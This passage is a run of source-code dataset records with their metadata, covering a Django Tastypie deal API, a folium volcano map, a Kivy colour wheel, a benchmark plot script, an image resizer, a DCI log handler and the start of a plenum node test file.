bundle.data['case_info'] = {\n \"name\": bundle.obj.case.name,\n \"tag\": bundle.obj.case.tag,\n \"user\": bundle.obj.case.user,\n \"created\": bundle.obj.case.created,\n }\n bundle.data['tag'] = [{'id': item.id, 'name': item.name} for item in bundle.obj.tag.all()]\n bundle.data['client_info'] = [bundle.obj.client, bundle.obj.client.importance]\n bundle.data['client_id'] = bundle.obj.client.id\n bundle.data['dealitem'] = [{\n \"id\": item.id,\n \"resource_uri\": \"/api/v1/product/%s\" % (item.product.id),\n \"product_name\": item.product,\n \"product_id\": item.product.id,\n \"quantity\": item.quantity,\n \"price\": float(item.product.price)} for item in bundle.obj.dealitem_set.filter(is_active=True)]\n\n bundle.data['deal_tickets'] = [{\n \"id\": item.id,\n \"name\": item.name,\n \"username\": item.user.username,\n } for item in bundle.obj.ticket_set.filter(is_active=True)]\n\n\n bundle.data['contacts'] = {\n \"name\": bundle.obj.client.name,\n \"tel\": bundle.obj.client.tel,\n \"mobile\": bundle.obj.client.mobile,\n \"qq\": bundle.obj.client.qq,\n \"email\": bundle.obj.client.email,\n \"address\": bundle.obj.client.address,\n }\n contacts = bundle.obj.client.contact_set.filter(is_active=True)\n if contacts.exists():\n bundle.data['contacts']['others'] = [{\"id\": contact.id, \"name\": contact.name} for contact in contacts]\n if bundle.obj.price:\n bundle.data['price'] = float(bundle.obj.price)\n return bundle\n\n def obj_create(self, bundle, **kwargs):\n bundle = super(DealResource, self).obj_create(bundle, company=bundle.request.user.company, **kwargs)\n return bundle\n\n def build_filters(self, filters, **kwargs):\n orm_filters = super(DealResource, self).build_filters(filters)\n tag_filter = filters.get('tag_filter', None)\n if tag_filter:\n orm_filters['tag__id__contains'] = tag_filter\n return orm_filters\n\nclass DealItemResource(ModelResource):\n deal = fields.ForeignKey('deal.api.DealResource', 'deal', full=False, null=True)\n product = fields.ForeignKey('catalog.api.ProductResource', 'product', full=False, null=True)\n\n class Meta:\n response_name = 'dealitem'\n queryset = DealItem.active.all().filter(deal__is_active=True)\n fields = ['id', 'deal', 'product', 'quantity', 'is_active', 'creator_ip',]\n filtering = {\n \"id\": ALL,\n \"is_active\": ALL,\n \"deal\": ALL_WITH_RELATIONS,\n }\n authorization = DealItemAuthorization()\n authentication = SessionAuthentication()\n serializer = Serializer(formats=['json', 'jsonp'])\n paginator_class = Paginator\n list_allowed_methods = ['get', 'put', 'post']\n detail_allowed_methods = ['get', 'put', 'post']\n ordering = ['id']\n always_return_data = True\n\n def dehydrate(self, bundle):\n bundle.data['product_name'] = bundle.obj.product.name\n bundle.data['price'] = bundle.obj.product.price\n bundle.data['product_id'] = bundle.obj.product.id\n return bundle\n", "sub_path": "deal/api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 6243, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "backend_log.logging_handler.ModelResourceProxy", "line_number": 22, "usage_type": "name"}, {"api_name": "client.models", "line_number": 23, "usage_type": "name"}, {"api_name": "tastypie.fields.ForeignKey", "line_number": 23, "usage_type": "call"}, {"api_name": "tastypie.fields", "line_number": 23, "usage_type": "name"}, {"api_name": "tastypie.fields.ForeignKey", "line_number": 24, "usage_type": "call"}, {"api_name": "tastypie.fields", "line_number": 24, "usage_type": "name"}, {"api_name": "tastypie.fields.ForeignKey", "line_number": 25, "usage_type": "call"}, {"api_name": "tastypie.fields", "line_number": 25, "usage_type": "name"}, {"api_name": "deal.models.Deal.active.all", "line_number": 29, "usage_type": "call"}, {"api_name": "deal.models.Deal.active", "line_number": 29, "usage_type": "attribute"}, {"api_name": "deal.models.Deal", "line_number": 29, "usage_type": "name"}, {"api_name": "tastypie.fields", "line_number": 30, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL", "line_number": 33, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL", "line_number": 34, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL", "line_number": 35, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL", "line_number": 36, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL", "line_number": 37, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL", "line_number": 38, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL_WITH_RELATIONS", "line_number": 39, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL_WITH_RELATIONS", "line_number": 40, "usage_type": "name"}, {"api_name": "deal.authorization.DealAuthorization", "line_number": 42, "usage_type": "call"}, {"api_name": "tastypie.authentication.SessionAuthentication", "line_number": 43, "usage_type": "call"}, {"api_name": "tastypie.validation.FormValidation", "line_number": 44, "usage_type": "call"}, {"api_name": "deal.forms.DealForm", "line_number": 44, "usage_type": "name"}, {"api_name": "tastypie.serializers.Serializer", "line_number": 45, "usage_type": "call"}, {"api_name": "tastypie.paginator.Paginator", "line_number": 46, "usage_type": "name"}, {"api_name": "client.models.Tag.objects.filter", "line_number": 55, "usage_type": "call"}, {"api_name": "client.models.Tag.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "client.models.Tag", "line_number": 55, "usage_type": "name"}, {"api_name": "backend_log.logging_handler.ModelResourceProxy", "line_number": 118, "usage_type": "name"}, {"api_name": "deal.models", "line_number": 119, "usage_type": "name"}, {"api_name": "tastypie.fields.ForeignKey", "line_number": 119, "usage_type": "call"}, {"api_name": "tastypie.fields", "line_number": 119, "usage_type": "name"}, {"api_name": "tastypie.fields.ForeignKey", "line_number": 120, "usage_type": "call"}, {"api_name": "tastypie.fields", "line_number": 120, "usage_type": "name"}, {"api_name": "deal.models.DealItem.active.all", "line_number": 124, "usage_type": "call"}, {"api_name": "deal.models.DealItem.active", "line_number": 124, "usage_type": "attribute"}, {"api_name": "deal.models.DealItem", "line_number": 124, "usage_type": "name"}, {"api_name": "tastypie.fields", "line_number": 125, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL", "line_number": 127, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL", "line_number": 128, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL_WITH_RELATIONS", "line_number": 129, "usage_type": "name"}, {"api_name": "deal.authorization.DealItemAuthorization", "line_number": 131, "usage_type": "call"}, {"api_name": "tastypie.authentication.SessionAuthentication", "line_number": 132, "usage_type": "call"}, {"api_name": "tastypie.serializers.Serializer", "line_number": 133, "usage_type": "call"}, {"api_name": "tastypie.paginator.Paginator", "line_number": 134, "usage_type": "name"}]} +{"seq_id": "362583956", "text": "import folium\nimport pandas as pd\n\n# read the volcano.txt file (even though the\n# function is 'read_csv') and store as 'df1' variable,\n# then read national_parks.csv and save as 'df2'\ndf1 = pd.read_csv(\"volcano.txt\")\ndf2 = pd.read_csv(\"us_national_parks.txt\")\ndf3 = pd.read_csv(\"us_capital.txt\")\n\n\n# correct apostrophes that mess with separation\ndf1['NAME'] = df1['NAME'].str.replace(\"'\", \"'\")\ndf2['Name'] = df2['Name'].str.replace(\"'\", \"'\")\n\navg_lat = (df1['LAT'].mean() + df2['Latitude'].mean()) / 2\navg_lon = (df1['LON'].mean() + df2['Longitude'].mean()) / 2\nlatmean = avg_lat\nlonmean = avg_lon\n\nmap = folium.Map(location=[latmean, lonmean], zoom_start=4, tiles='Stamen Terrain')\n\n\n# function that determines marker color based on elevation\ndef color(elevation):\n if elevation in range(0, 1000):\n col = 'green'\n elif elevation in range(1001, 1999):\n col = 'orange'\n elif elevation in range(2000, 2999):\n col = 'blue'\n else:\n col = 'red'\n return col\n\n\n# create a for loop that will go through each volcano and mark it. We zip it due to the different iterators we want\nfor lat1, lon1, name1, elev in zip(df1['LAT'], df1['LON'], df1['NAME'], df1['ELEV']):\n folium.Marker(location=[lat1, lon1], popup=name1, icon=folium.Icon(color=color(elev), icon_color='white', icon='cloud')).add_to(map)\n\n# create a for loop that will go through each national park and mark it gray\nfor lat2, lon2, name2 in zip(df2['Latitude'], df2['Longitude'], df2['Name']):\n folium.Marker(location=[lat2, lon2], popup=name2, icon=folium.Icon(color='purple', icon='info-sign')).add_to(map)\n\n\n# create a for loop that will go through each us city and mark it yellow\nfor lat3, lon3, city, state in zip(df3['Latitude'], df3['Longitude'], df3['CITY'], df3['STATE']):\n folium.Marker(location=[lat3, lon3], popup=city+\", \"+state, icon=folium.Icon(color='black', icon='star')).add_to(map)\n\nprint(map.save('mark_map.html'))\n\n", "sub_path": "web_map.py", "file_name": "web_map.py", "file_ext": "py", "file_size_in_byte": 1948, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 7, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 8, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 9, "usage_type": "call"}, {"api_name": "folium.Map", "line_number": 21, "usage_type": "call"}, {"api_name": "folium.Marker", "line_number": 39, "usage_type": "call"}, {"api_name": "folium.Icon", "line_number": 39, "usage_type": "call"}, {"api_name": "folium.Marker", "line_number": 43, "usage_type": "call"}, {"api_name": "folium.Icon", "line_number": 43, "usage_type": "call"}, {"api_name": "folium.Marker", "line_number": 48, "usage_type": "call"}, {"api_name": "folium.Icon", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "319008421", "text": "from kivy.uix.colorpicker import rect_to_polar\nfrom kivy.uix.widget import Widget\nfrom kivy.properties import (NumericProperty, BoundedNumericProperty,\n ListProperty,\n ReferenceListProperty)\nfrom kivy.clock import Clock\nfrom kivy.graphics import Color\nfrom math import pi\n\nfrom colorPickerCustom.colorArc import _ColorArc\nfrom colorPickerCustom.colorPickerApp import distance\n\n\nclass ColorWheel(Widget):\n '''Chromatic wheel for the ColorPicker.\n\n .. versionchanged:: 1.7.1\n `font_size`, `font_name` and `foreground_color` have been removed. The\n sizing is now the same as others widget, based on 'sp'. Orientation is\n also automatically determined according to the width/height ratio.\n\n '''\n\n r = BoundedNumericProperty(0, min=0, max=1)\n '''The Red value of the color currently selected.\n\n :attr:`r` is a :class:`~kivy.properties.BoundedNumericProperty` and\n can be a value from 0 to 1. It defaults to 0.\n '''\n\n g = BoundedNumericProperty(0, min=0, max=1)\n '''The Green value of the color currently selected.\n\n :attr:`g` is a :class:`~kivy.properties.BoundedNumericProperty`\n and can be a value from 0 to 1.\n '''\n\n b = BoundedNumericProperty(0, min=0, max=1)\n '''The Blue value of the color currently selected.\n\n :attr:`b` is a :class:`~kivy.properties.BoundedNumericProperty` and\n can be a value from 0 to 1.\n '''\n\n a = BoundedNumericProperty(0, min=0, max=1)\n '''The Alpha value of the color currently selected.\n\n :attr:`a` is a :class:`~kivy.properties.BoundedNumericProperty` and\n can be a value from 0 to 1.\n '''\n\n color = ReferenceListProperty(r, g, b, a)\n '''The holds the color currently selected.\n\n :attr:`color` is a :class:`~kivy.properties.ReferenceListProperty` and\n contains a list of `r`, `g`, `b`, `a` values.\n '''\n\n _origin = ListProperty((100, 100))\n _radius = NumericProperty(100)\n\n _piece_divisions = NumericProperty(10)\n _pieces_of_pie = NumericProperty(16)\n\n _inertia_slowdown = 1.25\n _inertia_cutoff = .25\n\n _num_touches = 0\n _pinch_flag = False\n\n _hsv = ListProperty([1, 1, 1, 0])\n\n def __init__(self, **kwargs):\n super(ColorWheel, self).__init__(**kwargs)\n\n pdv = self._piece_divisions\n self.sv_s = [(float(x) / pdv, 1) for x in range(pdv)] + [\n (1, float(y) / pdv) for y in reversed(range(pdv))]\n\n def on__origin(self, instance, value):\n self.init_wheel(None)\n\n def on__radius(self, instance, value):\n self.init_wheel(None)\n\n def init_wheel(self, dt,):\n # initialize list to hold all meshes\n self.canvas.clear()\n self.arcs = []\n self.sv_idx = 0\n pdv = self._piece_divisions\n ppie = self._pieces_of_pie\n\n for r in range(pdv):\n for t in range(ppie):\n self.arcs.append(\n _ColorArc(\n self._radius * (float(r) / float(pdv)),\n self._radius * (float(r + 1) / float(pdv)),\n 2 * pi * (float(t) / float(ppie)),\n 2 * pi * (float(t + 1) / float(ppie)),\n origin=self._origin,\n color=(float(t) / ppie,\n self.sv_s[self.sv_idx + r][0],\n self.sv_s[self.sv_idx + r][1],\n 1)))\n\n self.canvas.add(self.arcs[-1])\n\n def recolor_wheel(self):\n ppie = self._pieces_of_pie\n for idx, segment in enumerate(self.arcs):\n segment.change_color(\n sv=self.sv_s[int(self.sv_idx + idx / ppie)])\n\n def change_alpha(self, val):\n for idx, segment in enumerate(self.arcs):\n segment.change_color(a=val)\n\n def inertial_incr_sv_idx(self, dt):\n # if its already zoomed all the way out, cancel the inertial zoom\n if self.sv_idx == len(self.sv_s) - self._piece_divisions:\n return False\n\n self.sv_idx += 1\n self.recolor_wheel()\n if dt * self._inertia_slowdown > self._inertia_cutoff:\n return False\n else:\n Clock.schedule_once(self.inertial_incr_sv_idx,\n dt * self._inertia_slowdown)\n\n def inertial_decr_sv_idx(self, dt):\n # if its already zoomed all the way in, cancel the inertial zoom\n if self.sv_idx == 0:\n return False\n self.sv_idx -= 1\n self.recolor_wheel()\n if dt * self._inertia_slowdown > self._inertia_cutoff:\n return False\n else:\n Clock.schedule_once(self.inertial_decr_sv_idx,\n dt * self._inertia_slowdown)\n\n def on_touch_down(self, touch):\n r = self._get_touch_r(touch.pos)\n if r > self._radius:\n return False\n\n # code is still set up to allow pinch to zoom, but this is\n # disabled for now since it was fiddly with small wheels.\n # Comment out these lines and adjust on_touch_move to reenable\n # this.\n if self._num_touches != 0:\n return False\n\n touch.grab(self)\n self._num_touches += 1\n touch.ud['anchor_r'] = r\n touch.ud['orig_sv_idx'] = self.sv_idx\n touch.ud['orig_time'] = Clock.get_time()\n\n def on_touch_move(self, touch):\n if touch.grab_current is not self:\n return\n r = self._get_touch_r(touch.pos)\n goal_sv_idx = (touch.ud['orig_sv_idx'] -\n int((r - touch.ud['anchor_r']) /\n (float(self._radius) / self._piece_divisions)))\n\n if (\n goal_sv_idx != self.sv_idx and\n goal_sv_idx >= 0 and\n goal_sv_idx <= len(self.sv_s) - self._piece_divisions\n ):\n # this is a pinch to zoom\n self._pinch_flag = True\n self.sv_idx = goal_sv_idx\n self.recolor_wheel()\n\n def on_touch_up(self, touch):\n if touch.grab_current is not self:\n return\n touch.ungrab(self)\n self._num_touches -= 1\n if self._pinch_flag:\n if self._num_touches == 0:\n # user was pinching, and now both fingers are up. Return\n # to normal\n if self.sv_idx > touch.ud['orig_sv_idx']:\n Clock.schedule_once(\n self.inertial_incr_sv_idx,\n (Clock.get_time() - touch.ud['orig_time']) /\n (self.sv_idx - touch.ud['orig_sv_idx']))\n\n if self.sv_idx < touch.ud['orig_sv_idx']:\n Clock.schedule_once(\n self.inertial_decr_sv_idx,\n (Clock.get_time() - touch.ud['orig_time']) /\n (self.sv_idx - touch.ud['orig_sv_idx']))\n\n self._pinch_flag = False\n return\n else:\n # user was pinching, and at least one finger remains. We\n # don't want to treat the remaining fingers as touches\n return\n else:\n r, theta = rect_to_polar(self._origin, *touch.pos)\n # if touch up is outside the wheel, ignore\n if r >= self._radius:\n return\n # compute which ColorArc is being touched (they aren't\n # widgets so we don't get collide_point) and set\n # _hsv based on the selected ColorArc\n piece = int((theta / (2 * pi)) * self._pieces_of_pie)\n division = int((r / self._radius) * self._piece_divisions)\n self._hsv = \\\n self.arcs[self._pieces_of_pie * division + piece].color\n\n def on__hsv(self, instance, value):\n c_hsv = Color(*value, mode='hsv')\n self.r = c_hsv.r\n self.g = c_hsv.g\n self.b = c_hsv.b\n self.a = c_hsv.a\n self.rgba = (self.r, self.g, self.b, self.a)\n\n def _get_touch_r(self, pos):\n return distance(pos, self._origin)\n\n", "sub_path": "colorPickerCustom/ColorWheel.py", "file_name": "ColorWheel.py", "file_ext": "py", "file_size_in_byte": 8052, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "kivy.uix.widget.Widget", "line_number": 14, "usage_type": "name"}, {"api_name": "kivy.properties.BoundedNumericProperty", "line_number": 24, "usage_type": "call"}, {"api_name": "kivy.properties.BoundedNumericProperty", "line_number": 31, "usage_type": "call"}, {"api_name": "kivy.properties.BoundedNumericProperty", "line_number": 38, "usage_type": "call"}, {"api_name": "kivy.properties.BoundedNumericProperty", "line_number": 45, "usage_type": "call"}, {"api_name": "kivy.properties.ReferenceListProperty", "line_number": 52, "usage_type": "call"}, {"api_name": "kivy.properties.ListProperty", "line_number": 59, "usage_type": "call"}, {"api_name": "kivy.properties.NumericProperty", "line_number": 60, "usage_type": "call"}, {"api_name": "kivy.properties.NumericProperty", "line_number": 62, "usage_type": "call"}, {"api_name": "kivy.properties.NumericProperty", "line_number": 63, "usage_type": "call"}, {"api_name": "kivy.properties.ListProperty", "line_number": 71, "usage_type": "call"}, {"api_name": "colorPickerCustom.colorArc._ColorArc", "line_number": 97, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 100, "usage_type": "name"}, {"api_name": "math.pi", "line_number": 101, "usage_type": "name"}, {"api_name": "kivy.clock.Clock.schedule_once", "line_number": 130, "usage_type": "call"}, {"api_name": "kivy.clock.Clock", "line_number": 130, "usage_type": "name"}, {"api_name": "kivy.clock.Clock.schedule_once", "line_number": 142, "usage_type": "call"}, {"api_name": "kivy.clock.Clock", "line_number": 142, "usage_type": "name"}, {"api_name": "kivy.clock.Clock.get_time", "line_number": 161, "usage_type": "call"}, {"api_name": "kivy.clock.Clock", "line_number": 161, "usage_type": "name"}, {"api_name": "kivy.clock.Clock.schedule_once", "line_number": 191, "usage_type": "call"}, {"api_name": "kivy.clock.Clock", "line_number": 191, "usage_type": "name"}, {"api_name": "kivy.clock.Clock.get_time", "line_number": 193, "usage_type": "call"}, {"api_name": "kivy.clock.Clock", "line_number": 193, "usage_type": "name"}, {"api_name": "kivy.clock.Clock.schedule_once", "line_number": 197, "usage_type": "call"}, {"api_name": "kivy.clock.Clock", "line_number": 197, "usage_type": "name"}, {"api_name": "kivy.clock.Clock.get_time", "line_number": 199, "usage_type": "call"}, {"api_name": "kivy.clock.Clock", "line_number": 199, "usage_type": "name"}, {"api_name": "kivy.uix.colorpicker.rect_to_polar", "line_number": 209, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 216, "usage_type": "name"}, {"api_name": "kivy.graphics.Color", "line_number": 222, "usage_type": "call"}, {"api_name": "colorPickerCustom.colorPickerApp.distance", "line_number": 230, "usage_type": "call"}]} +{"seq_id": "167329262", "text": "#!/usr/bin/env python3\n\nimport glob\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport sys\nfrom common import sizeof_fmt, common_style, mk_groups, KBYTES, SMALL_SIZE, MEDIUM_SIZE, LARGE_SIZE\n\nlabels = {\n 'app-sqlite-linux-native.dat': 'Linux\\n(native)',\n 'app-sqlite-newlib-native.dat': 'newlib\\n(native)',\n 'app-sqlite-musl-native.dat': 'musl\\n(native)',\n 'app-sqlite-musl-compat.dat': 'musl\\n(external)',\n }\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print(\"Usage: {}
\".format(sys.argv[0]), file=sys.stderr)\n sys.exit(1)\n\n os.chdir(sys.argv[1])\n\n stats = {}\n max_time = 0\n for fn in glob.glob(\"*.dat\"):\n data = np.loadtxt(fn)\n avg = np.average(data)\n std = np.std(data)\n stats[fn] = {\n 'min': avg - std,\n 'avg': avg,\n 'max': avg + std,\n }\n if stats[fn]['max'] > max_time:\n max_time = stats[fn]['max']\n\n # General style\n common_style(plt)\n\n max_time *= 1.2 # Margin above biggest bar\n\n fig = plt.figure(figsize=(8, 4))\n ax = fig.add_subplot(1, 1, 1)\n ax.set_ylabel(\"Time (seconds)\", fontsize=LARGE_SIZE)\n ax.grid(which='major', axis='y', linestyle=':', alpha=0.5, zorder=0)\n yticks = np.arange(0, max_time, step=1)\n ax.set_yticks(yticks, minor=False)\n ax.set_yticklabels([\"%3.0f\" % ytick for ytick in yticks])\n ax.set_ylim(0, max_time)\n\n xlabels = []\n i = 0\n for experiment in labels.keys():\n xlabels.append(labels[experiment])\n time = stats[experiment]\n\n yerr = time['max'] - time['min']\n print(experiment, time['avg'], '+/-', yerr/2)\n\n # Plot each application\n bar = ax.bar([i + 1], time['avg'],\n label=experiment,\n align='center',\n zorder=4,\n yerr=time['max']-time['min'],\n error_kw=dict(lw=2, capsize=10, capthick=1),\n width=0.4,\n color='#5697C4',\n linewidth=0.5\n )\n ax.text(i + 1, time['avg'] + yerr + .05, \"%3.3f\" % time['avg'],\n ha='center',\n va='bottom',\n zorder=6,\n fontsize=LARGE_SIZE,\n linespacing=0,\n bbox=dict(pad=-.6, facecolor='white', linewidth=0),\n rotation='horizontal'\n )\n i += 1\n\n xticks = range(1, len(xlabels) + 1)\n ax.set_xticks(xticks)\n ax.set_xticklabels(xlabels, fontsize=LARGE_SIZE, fontweight='bold')\n ax.set_xlim(.5, len(xlabels) + .5)\n ax.yaxis.grid(True, zorder=0, linestyle=':')\n ax.tick_params(axis='both', which='both', length=0)\n\n plt.setp(ax.lines, linewidth=.5)\n\n fig.tight_layout()\n fig.savefig(sys.argv[2])\n", "sub_path": "experiments/fig_17_unikraft-sqlite-libc/plot.py", "file_name": "plot.py", "file_ext": "py", "file_size_in_byte": 2849, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 20, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 29, "usage_type": "call"}, {"api_name": "common.common_style", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "common.LARGE_SIZE", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 47, "usage_type": "call"}, {"api_name": "common.LARGE_SIZE", "line_number": 76, "usage_type": "name"}, {"api_name": "common.LARGE_SIZE", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 93, "usage_type": "attribute"}]} +{"seq_id": "461370246", "text": "import os\nfrom PIL import Image\nfrom resizeimage import resizeimage\n\n\n\nimgExts = [\"png\", \"bmp\", \"jpg\"]\nfor path, dirs, files in os.walk(os.getcwd()):\n for fileName in files:\n print(fileName)\n ext = fileName[-3:].lower()\n if ext not in imgExts:\n continue\n im = Image.open(os.path.join(path, fileName))\n im2 = im.resize((int(1200),int(1700)))\n im2.save(os.path.join(path, fileName))\n", "sub_path": "apple.py", "file_name": "apple.py", "file_ext": "py", "file_size_in_byte": 437, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.walk", "line_number": 8, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 14, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 14, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}]} +{"seq_id": "554332446", "text": "# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2016 Red Hat, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport functools\nimport io\nimport logging\nimport sys\nimport threading\n\nfrom dciclient.v1.api import file as dci_file\n\n\ndef setup_logging(dci_context):\n logger = logging.getLogger('__chainsaw__')\n logger.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\n \"%(asctime)s::%(levelname)s::%(message)s\")\n stream_handler = logging.StreamHandler(stream=sys.stdout)\n stream_handler.setFormatter(formatter)\n\n file_handler = logging.FileHandler('chainsaw.log', mode='w')\n file_handler.setFormatter(formatter)\n\n dci_handler = DciHandler(dci_context)\n dci_handler.setFormatter(formatter)\n\n try:\n import colorlog\n\n colored_formatter = colorlog.ColoredFormatter(\n \"%(log_color)s%(asctime)s::%(levelname)s::%(message)s\",\n datefmt=None,\n reset=True,\n log_colors={\n 'DEBUG': 'cyan',\n 'INFO': 'green',\n 'WARNING': 'yellow',\n 'ERROR': 'red',\n 'CRITICAL': 'red'\n }\n )\n stream_handler.setFormatter(colored_formatter)\n except ImportError:\n pass\n logger.addHandler(stream_handler)\n logger.addHandler(file_handler)\n logger.addHandler(dci_handler)\n\n\nclass DciHandler(logging.Handler):\n def __init__(self, dci_context):\n logging.Handler.__init__(self)\n self._dci_context = dci_context\n self._idx_file = 0\n self._current_log = io.StringIO()\n self._threshold_log = 512 * 1024 # 512K\n self._interval = 60 # 1 minute\n timer_handle = functools.partial(self.handle, record=None)\n self._timer = threading.Timer(self._interval, timer_handle)\n try:\n self._timer.start()\n except KeyboardInterrupt:\n self._timer.cancel()\n raise\n\n def _send_log_file(self):\n if not self._dci_context.last_jobstate_id:\n return\n jobstate_id = self._dci_context.last_jobstate_id\n dci_file.create(self._dci_context, 'chainsaw.log-%s' % self._idx_file,\n self._current_log.getvalue(), 'text/plain',\n jobstate_id)\n self._current_log.truncate(0)\n self._current_log.seek(0)\n self._idx_file += 1\n\n def emit(self, record):\n # run by the timer\n if record is None:\n if len(self._current_log.getvalue()) > 0:\n self._send_log_file()\n return\n msg = u\"%s\\n\" % self.format(record)\n self._current_log.write(msg)\n #  if its an error then send the log\n if record.levelno == logging.ERROR:\n self._send_log_file()\n # if we reach the current log threshold\n elif len(self._current_log.getvalue()) > self._threshold_log:\n self._send_log_file()\n", "sub_path": "rdomhelper/logger.py", "file_name": "logger.py", "file_ext": "py", "file_size_in_byte": 3414, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 28, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 29, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 31, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 31, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 34, "usage_type": "call"}, {"api_name": "colorlog.ColoredFormatter", "line_number": 43, "usage_type": "call"}, {"api_name": "logging.Handler", "line_number": 63, "usage_type": "attribute"}, {"api_name": "logging.Handler.__init__", "line_number": 65, "usage_type": "call"}, {"api_name": "logging.Handler", "line_number": 65, "usage_type": "attribute"}, {"api_name": "io.StringIO", "line_number": 68, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 71, "usage_type": "call"}, {"api_name": "threading.Timer", "line_number": 72, "usage_type": "call"}, {"api_name": "dciclient.v1.api.file.create", "line_number": 83, "usage_type": "call"}, {"api_name": "dciclient.v1.api.file", "line_number": 83, "usage_type": "name"}, {"api_name": "logging.ERROR", "line_number": 99, "usage_type": "attribute"}]} +{"seq_id": "558804045", "text": "import itertools\nfrom copy import copy\n\nimport base58\nfrom plenum.common.constants import *\nfrom plenum.common.signer_simple import SimpleSigner\nfrom plenum.common.util import getMaxFailures, randomString\nfrom plenum.test import waits\nfrom plenum.test.helper import sendReqsToNodesAndVerifySuffReplies, \\\n waitRejectWithReason, \\\n waitReqNackFromPoolWithReason\nfrom plenum.test.node_catchup.helper import waitNodeDataEquality, \\\n ensureClientConnectedToNodesAndPoolLedgerSame\nfrom plenum.test.pool_transactions.helper import addNewClient, addNewStewardAndNode, sendAddNewNode\nfrom plenum.test.test_node import checkNodesConnected, \\\n checkProtocolInstanceSetup\n\nfrom stp_core.common.log import getlogger\nfrom stp_core.loop.eventually import eventually\n\nlogger = getlogger()\n\n# logged errors to ignore\nwhitelist = ['found legacy entry', \"doesn't match\", 'reconciling nodeReg',\n 'missing', 'conflicts', 'matches', 'nodeReg',\n 'conflicting address', 'unable to send message',\n 'got error while verifying message']\n\n\n# Whitelisting \"got error while verifying message\" since a node while not have\n# initialised a connection for a new node by the time the new node's message\n# reaches it\n\n\ndef testNodesConnect(txnPoolNodeSet):\n pass\n\n\ndef testNodesReceiveClientMsgs(looper, txnPoolNodeSet, wallet1, client1,\n client1Connected):\n ensureClientConnectedToNodesAndPoolLedgerSame(looper, client1,\n *txnPoolNodeSet)\n sendReqsToNodesAndVerifySuffReplies(looper, wallet1, client1, 1)\n\n\ndef testAddNewClient(looper, txnPoolNodeSet, steward1, stewardWallet):\n wallet = addNewClient(None, looper, steward1, stewardWallet, randomString())\n\n def chk():\n for node in txnPoolNodeSet:\n assert wallet.defaultId in node.clientAuthNr.clients\n\n timeout = waits.expectedTransactionExecutionTime(len(txnPoolNodeSet))\n looper.run(eventually(chk, retryWait=1, timeout=timeout))\n\n\ndef 